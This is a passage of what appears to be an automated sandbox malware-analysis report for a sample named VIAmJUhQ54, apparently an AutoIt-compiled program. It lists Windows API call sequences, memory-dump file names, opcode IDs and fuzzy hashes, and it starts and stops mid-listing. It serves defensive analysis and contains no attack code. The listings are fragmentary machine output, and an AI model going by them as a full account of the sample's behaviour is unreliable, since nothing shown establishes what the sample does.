                                                                                  • Part of subcall function 0074123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00748036
                                                                                  • Part of subcall function 0074123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00748049
                                                                                  • Part of subcall function 0074123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0074805C
                                                                                  • Part of subcall function 0074123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 0074806F
                                                                                • __mtinitlocks.LIBCMT ref: 00747B4C
                                                                                  • Part of subcall function 00747E23: InitializeCriticalSectionAndSpinCount.KERNEL32(007DAC68,00000FA0,?,?,00747B51,00745E77,007D6C70,00000014), ref: 00747E41
                                                                                • __mtterm.LIBCMT ref: 00747B55
                                                                                  • Part of subcall function 00747BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00747B5A,00745E77,007D6C70,00000014), ref: 00747D3F
                                                                                  • Part of subcall function 00747BBD: _free.LIBCMT ref: 00747D46
                                                                                  • Part of subcall function 00747BBD: DeleteCriticalSection.KERNEL32(007DAC68,?,?,00747B5A,00745E77,007D6C70,00000014), ref: 00747D68
                                                                                • __calloc_crt.LIBCMT ref: 00747B7A
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00747BA3
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                                                • String ID:
                                                                                • API String ID: 2942034483-0
                                                                                • Opcode ID: 6eab2f4dcd7088c19cc48cdfccc97057e00a17f6d2b46ebe06fb669af8c7f3bd
                                                                                • Instruction ID: 8a14ee7a8ee3b5f3fb928ef132255707a3745ce0fd9defbd4f26a7e65032c903
                                                                                • Opcode Fuzzy Hash: 6eab2f4dcd7088c19cc48cdfccc97057e00a17f6d2b46ebe06fb669af8c7f3bd
                                                                                • Instruction Fuzzy Hash: 21F096B221D31199E62D77347C0A65A2794DF02734B214B99F964D54D1FF2C8C41C5A9
                                                                                APIs
                                                                                • MapVirtualKeyW.USER32(0000005B,00000000), ref: 0072281D
                                                                                • MapVirtualKeyW.USER32(00000010,00000000), ref: 00722825
                                                                                • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00722830
                                                                                • MapVirtualKeyW.USER32(000000A1,00000000), ref: 0072283B
                                                                                • MapVirtualKeyW.USER32(00000011,00000000), ref: 00722843
                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0072284B
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Virtual
                                                                                • String ID:
                                                                                • API String ID: 4278518827-0
                                                                                • Opcode ID: ba7beb39d28d6e899c7ab01f1fcf4a64f25c5dc27a52cbe1ef173bdc1766416e
                                                                                • Instruction ID: a4fe247018495b44578e221b8ca63e0cf8c28189323c49dba781e4f642b1c417
                                                                                • Opcode Fuzzy Hash: ba7beb39d28d6e899c7ab01f1fcf4a64f25c5dc27a52cbe1ef173bdc1766416e
                                                                                • Instruction Fuzzy Hash: F50167B0902B5ABDE3008F6A8C85B52FFA8FF59394F00411BA15C47A42C7F5A864CFE5
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                                                • String ID:
                                                                                • API String ID: 1423608774-0
                                                                                • Opcode ID: 7c74a0a9c7e53c37f5670e296a14f0543aa2178411dba3d36d41ec5106e2a780
                                                                                • Instruction ID: 025e749e0f958115f4e646cb28ae0eb28ea4bce57a191291af61cf1b0cb47d95
                                                                                • Opcode Fuzzy Hash: 7c74a0a9c7e53c37f5670e296a14f0543aa2178411dba3d36d41ec5106e2a780
                                                                                • Instruction Fuzzy Hash: C4018136102211EBDB251B94EC48EEB77ADFFC9702B048429FA03968A0DB7C9C00DB54
                                                                                APIs
                                                                                • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00767C07
                                                                                • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00767C1D
                                                                                • GetWindowThreadProcessId.USER32(?,?), ref: 00767C2C
                                                                                • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00767C3B
                                                                                • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00767C45
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00767C4C
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                • String ID:
                                                                                • API String ID: 839392675-0
                                                                                • Opcode ID: b452a808007793b5871905facacf8a135817dd71b8f83dbd2ffeb120b753f6f1
                                                                                • Instruction ID: a447e191e238114c9f6e1766e2c01520e5eb652c5f90ff0e6313335809445a41
                                                                                • Opcode Fuzzy Hash: b452a808007793b5871905facacf8a135817dd71b8f83dbd2ffeb120b753f6f1
                                                                                • Instruction Fuzzy Hash: 6EF01772242158BBE7315B529C0EEEF7B7CEBC7B55F044018FA0291451D7A85E41C6B9
                                                                                APIs
                                                                                • InterlockedExchange.KERNEL32(?,?), ref: 00769A33
                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,00795DEE,?,?,?,?,?,0072ED63), ref: 00769A44
                                                                                • TerminateThread.KERNEL32(?,000001F6,?,?,?,00795DEE,?,?,?,?,?,0072ED63), ref: 00769A51
                                                                                • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00795DEE,?,?,?,?,?,0072ED63), ref: 00769A5E
                                                                                  • Part of subcall function 007693D1: CloseHandle.KERNEL32(?,?,00769A6B,?,?,?,00795DEE,?,?,?,?,?,0072ED63), ref: 007693DB
                                                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 00769A71
                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,?,00795DEE,?,?,?,?,?,0072ED63), ref: 00769A78
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                • String ID:
                                                                                • API String ID: 3495660284-0
                                                                                • Opcode ID: df1de6d5cd164c6edeb2f32817e03e21322d061ee0ddd75d9ca553b1dad7b36a
                                                                                • Instruction ID: f9db6bf8912965ffa596fe451e455812bc159abc48dfd3dd9af8ded457ef0dab
                                                                                • Opcode Fuzzy Hash: df1de6d5cd164c6edeb2f32817e03e21322d061ee0ddd75d9ca553b1dad7b36a
                                                                                • Instruction Fuzzy Hash: 7FF05E76141211ABD7211BA4EC8DEEA7769FFC6302B148425F603958E0DB7D9C01DB54
                                                                                APIs
                                                                                  • Part of subcall function 0073F4EA: std::exception::exception.LIBCMT ref: 0073F51E
                                                                                  • Part of subcall function 0073F4EA: __CxxThrowException@8.LIBCMT ref: 0073F533
                                                                                • __swprintf.LIBCMT ref: 00721EA6
                                                                                Strings
                                                                                • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00721D49
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Exception@8Throw__swprintfstd::exception::exception
                                                                                • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                • API String ID: 2125237772-557222456
                                                                                • Opcode ID: 5f1b24636bc123248e715ed736e1fb56985ea326cf40fee6e32a99ec67355123
                                                                                • Instruction ID: 9b43af31f2737fd135c9e1ae0857a7f41cf342f5372ef315e3b352e96f7db43a
                                                                                • Opcode Fuzzy Hash: 5f1b24636bc123248e715ed736e1fb56985ea326cf40fee6e32a99ec67355123
                                                                                • Instruction Fuzzy Hash: 7F91AC71504261EFCB25EF24E889C6EB7A4FF95700F51491DF885972A2DB38ED04CB92
                                                                                APIs
                                                                                • VariantInit.OLEAUT32(?), ref: 0077B006
                                                                                • CharUpperBuffW.USER32(?,?), ref: 0077B115
                                                                                • VariantClear.OLEAUT32(?), ref: 0077B298
                                                                                  • Part of subcall function 00769DC5: VariantInit.OLEAUT32(00000000), ref: 00769E05
                                                                                  • Part of subcall function 00769DC5: VariantCopy.OLEAUT32(?,?), ref: 00769E0E
                                                                                  • Part of subcall function 00769DC5: VariantClear.OLEAUT32(?), ref: 00769E1A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                • API String ID: 4237274167-1221869570
                                                                                • Opcode ID: e8b5d3d72bf2db250379d89dd7f733a14571b84be9dcd0bac1b565a8b55970f5
                                                                                • Instruction ID: f3ef9e8ef8b966c6bf092417bce061323167c010b719ec40812d4e0e8fd51cec
                                                                                • Opcode Fuzzy Hash: e8b5d3d72bf2db250379d89dd7f733a14571b84be9dcd0bac1b565a8b55970f5
                                                                                • Instruction Fuzzy Hash: 9C916A70608305DFCB10DF24D485A5ABBF4BF89744F04886DF89A9B362DB39E945CB52
                                                                                APIs
                                                                                  • Part of subcall function 0073C6F4: _wcscpy.LIBCMT ref: 0073C717
                                                                                • _memset.LIBCMT ref: 00765438
                                                                                • GetMenuItemInfoW.USER32(?), ref: 00765467
                                                                                • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00765513
                                                                                • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0076553D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                • String ID: 0
                                                                                • API String ID: 4152858687-4108050209
                                                                                • Opcode ID: fcc2742f5d19e069d7ce176c6c2860f5e4c7ed6fe500e797d986dcd52d5071ea
                                                                                • Instruction ID: 2616227631bcfde25b00f77496913dd5a27ae710af76c93a890012f002981054
                                                                                • Opcode Fuzzy Hash: fcc2742f5d19e069d7ce176c6c2860f5e4c7ed6fe500e797d986dcd52d5071ea
                                                                                • Instruction Fuzzy Hash: 515133716047419BD310DB28C8496ABBBEAAF85724F14062EFC97D3292DB7CCC44AB42
                                                                                APIs
                                                                                • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0076027B
                                                                                • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 007602B1
                                                                                • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 007602C2
                                                                                • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00760344
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                • String ID: DllGetClassObject
                                                                                • API String ID: 753597075-1075368562
                                                                                • Opcode ID: 6447c4dfe9ac66b0d5c48bf0f6401ff6308add43c604903ea8f83ed183db6986
                                                                                • Instruction ID: 099449623cff2c00ae0d0287b302ded1acafbb54cfe0a2eb00973ea304449f83
                                                                                • Opcode Fuzzy Hash: 6447c4dfe9ac66b0d5c48bf0f6401ff6308add43c604903ea8f83ed183db6986
                                                                                • Instruction Fuzzy Hash: 044138B1600204EFDB15CF65C884A9B7BB9EF85311B1480ADED0A9F206D7B9DE44DBE0
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 00765075
                                                                                • GetMenuItemInfoW.USER32 ref: 00765091
                                                                                • DeleteMenu.USER32(00000004,00000007,00000000), ref: 007650D7
                                                                                • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,007E1708,00000000), ref: 00765120
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$Delete$InfoItem_memset
                                                                                • String ID: 0
                                                                                • API String ID: 1173514356-4108050209
                                                                                • Opcode ID: 25bb9ef9222b6439471262b43e71bc55ad37a8040e5a5126fea6ca98864c198c
                                                                                • Instruction ID: b236ffed89f34f00ed73b7cbfbbc416fab11bd538d2fe473f5e84ac48b0a4ab7
                                                                                • Opcode Fuzzy Hash: 25bb9ef9222b6439471262b43e71bc55ad37a8040e5a5126fea6ca98864c198c
                                                                                • Instruction Fuzzy Hash: D441E230204701EFD724DF24D884B6AB7E4AF8A324F144A1EFD9697391D738E904DB62
                                                                                APIs
                                                                                • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0076E742
                                                                                • GetLastError.KERNEL32(?,00000000), ref: 0076E768
                                                                                • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0076E78D
                                                                                • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0076E7B9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                • String ID: p1Mw`KNw
                                                                                • API String ID: 3321077145-3626030660
                                                                                • Opcode ID: cecde0dee41501db56fa3f667b653dbd27378cbcf569b83280e42137bc7784e1
                                                                                • Instruction ID: 7332a57a101d5dae70ca4f25414c23f47dabb52c346a58ce4149ddf622a6c6d3
                                                                                • Opcode Fuzzy Hash: cecde0dee41501db56fa3f667b653dbd27378cbcf569b83280e42137bc7784e1
                                                                                • Instruction Fuzzy Hash: 3B410439600610DFCF11EF15C448A4DBBE5BF99710F198498EA46AB3A2CB38FD01CBA5
                                                                                APIs
                                                                                • CharLowerBuffW.USER32(?,?,?,?), ref: 00780587
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: BuffCharLower
                                                                                • String ID: cdecl$none$stdcall$winapi
                                                                                • API String ID: 2358735015-567219261
                                                                                • Opcode ID: c931e2859969d399175562a7346d400c29266c6d797f2480836419bb1b1939c4
                                                                                • Instruction ID: 1998b5db252ebba87b9711f88f7f7a43d77268bd0a46f759b703c32b12176055
                                                                                • Opcode Fuzzy Hash: c931e2859969d399175562a7346d400c29266c6d797f2480836419bb1b1939c4
                                                                                • Instruction Fuzzy Hash: 5131C67060011AEFCF00EF54CD459EEB3B4FF54310B00862AE426A76D1EB79E915CB90
                                                                                APIs
                                                                                • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 0075B88E
                                                                                • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 0075B8A1
                                                                                • SendMessageW.USER32(?,00000189,?,00000000), ref: 0075B8D1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID: ComboBox$ListBox
                                                                                • API String ID: 3850602802-1403004172
                                                                                • Opcode ID: 6b36bc4200d336b9c03c1c0797ffd1bcfc01dbf03e6e709719c8c0c2212bd7eb
                                                                                • Instruction ID: cdfcecdc49c0885a51e1c663b9bcf74d07bc4b9c00b3fba36a101e95013d830d
                                                                                • Opcode Fuzzy Hash: 6b36bc4200d336b9c03c1c0797ffd1bcfc01dbf03e6e709719c8c0c2212bd7eb
                                                                                • Instruction Fuzzy Hash: 5321F6B1900108FFDB14AB64D88ADFE777CDF55351B109129F822A71E1DBBC6D0A9B60
                                                                                APIs
                                                                                • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00774401
                                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00774427
                                                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00774457
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0077449E
                                                                                  • Part of subcall function 00775052: GetLastError.KERNEL32(?,?,007743CC,00000000,00000000,00000001), ref: 00775067
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                                                • String ID:
                                                                                • API String ID: 1951874230-3916222277
                                                                                • Opcode ID: c4eb5d9050617abbe09625586ced737bafc0a330eca197627148291a6c81026a
                                                                                • Instruction ID: 226ca1abe4d55ca656622a7cc3d5a67f8c070b0d6513d32f52d10afde230a979
                                                                                • Opcode Fuzzy Hash: c4eb5d9050617abbe09625586ced737bafc0a330eca197627148291a6c81026a
                                                                                • Instruction Fuzzy Hash: B32150B2600208BEEB219F64CC85EBF76EDEB89794F10C52AF50996140DB789D05A771
                                                                                APIs
                                                                                  • Part of subcall function 0073D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0073D1BA
                                                                                  • Part of subcall function 0073D17C: GetStockObject.GDI32(00000011), ref: 0073D1CE
                                                                                  • Part of subcall function 0073D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0073D1D8
                                                                                • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 0078915C
                                                                                • LoadLibraryW.KERNEL32(?), ref: 00789163
                                                                                • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00789178
                                                                                • DestroyWindow.USER32(?), ref: 00789180
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                • String ID: SysAnimate32
                                                                                • API String ID: 4146253029-1011021900
                                                                                • Opcode ID: d91e6c2000c0240fbd4bddc97b5ceaedcb35721efeb9dd6214f1cb2b98bf5e44
